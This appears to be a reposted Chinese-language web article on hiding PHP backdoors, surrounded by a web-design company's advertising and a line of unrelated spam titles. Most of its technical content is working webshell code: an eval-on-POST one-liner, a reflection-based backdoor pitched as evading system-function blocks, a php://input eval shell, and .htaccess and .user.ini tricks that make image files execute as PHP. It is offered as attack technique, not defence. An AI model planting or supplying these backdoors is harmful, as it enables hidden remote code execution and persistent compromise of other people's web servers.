php后門隱藏技巧

一句話 and 大馬

phpspy 菜刀一句話<?php@eval($_POST['cmd']);?>

成都創(chuàng)新互聯(lián)公司專業(yè)成都網(wǎng)站設(shè)計(jì)、成都做網(wǎng)站、外貿(mào)網(wǎng)站建設(shè)，集網(wǎng)站策劃、網(wǎng)站設(shè)計(jì)、網(wǎng)站制作于一體，網(wǎng)站seo、網(wǎng)站優(yōu)化、網(wǎng)站營銷、軟文營銷等專業(yè)人才根據(jù)搜索規(guī)律編程設(shè)計(jì)，讓網(wǎng)站在運(yùn)行后，在搜索中有好的表現(xiàn)，專業(yè)設(shè)計(jì)制作為您帶來效益的網(wǎng)站！讓網(wǎng)站建設(shè)為您創(chuàng)造效益。

反射后門

<?php

$func = new ReflectionFunction($_GET[m]);

echo $func->invokeArgs(array($_GET[c]));

調(diào)用如x.php?m=system&c=whoami
后門也可繞過某些檢測禁用system函數(shù)的防護(hù)系統(tǒng)

php后門隱藏技巧

php:input

php://input是用來接收post數(shù)據(jù)（這里有php://input的介紹）

<?php

@eval(file_get_contents('php://input'))

Post提交 system('whoami');

php后門隱藏技巧

.htaccess(需webserver支持)

可以設(shè)置任意后綴也可以設(shè)置UTF7編碼格式shell

AddType application/x-httpd-php .jpg

然后再傳一個(gè)JPG結(jié)尾的shell，訪問即可執(zhí)行了

.user.ini(需fastcgi配合)

動(dòng)態(tài)修改php.ini配置文件

User.ini

auto_prepend_file:指定在每個(gè)PHP頁面執(zhí)行前所要執(zhí)行的代碼

auto_prepend_file=demo.gif (每個(gè)頁面都會(huì)加載demo.gif)

php后門隱藏技巧

使用php://input （不需要上傳額外的文件）(需要自行打開allow_url_include=on 默認(rèn)為off)

缺點(diǎn):不支持.user.ini修改allow_url_include (在PHP5時(shí)是PHP_INI_SYSTEM。從PHP5.2.0起可用。)

php后門隱藏技巧

http://php.net/manual/zh/ini.list.php

http://php.net/manual/zh/configuration.changes.modes.php

附件：http://down.51cto.com/data/2366063

文章題目：php后門隱藏技巧
網(wǎng)站地址：http://chinadenli.net/article42/pgjdhc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供關(guān)鍵詞優(yōu)化、企業(yè)建站、ChatGPT、營銷型網(wǎng)站建設(shè)、小程序開發(fā)、企業(yè)網(wǎng)站制作

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源：創(chuàng)新互聯(lián)

猜你還喜歡下面的內(nèi)容

欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

php后門隱藏技巧

一句話 and 大馬

php:input

.htaccess(需webserver支持)

.user.ini(需fastcgi配合)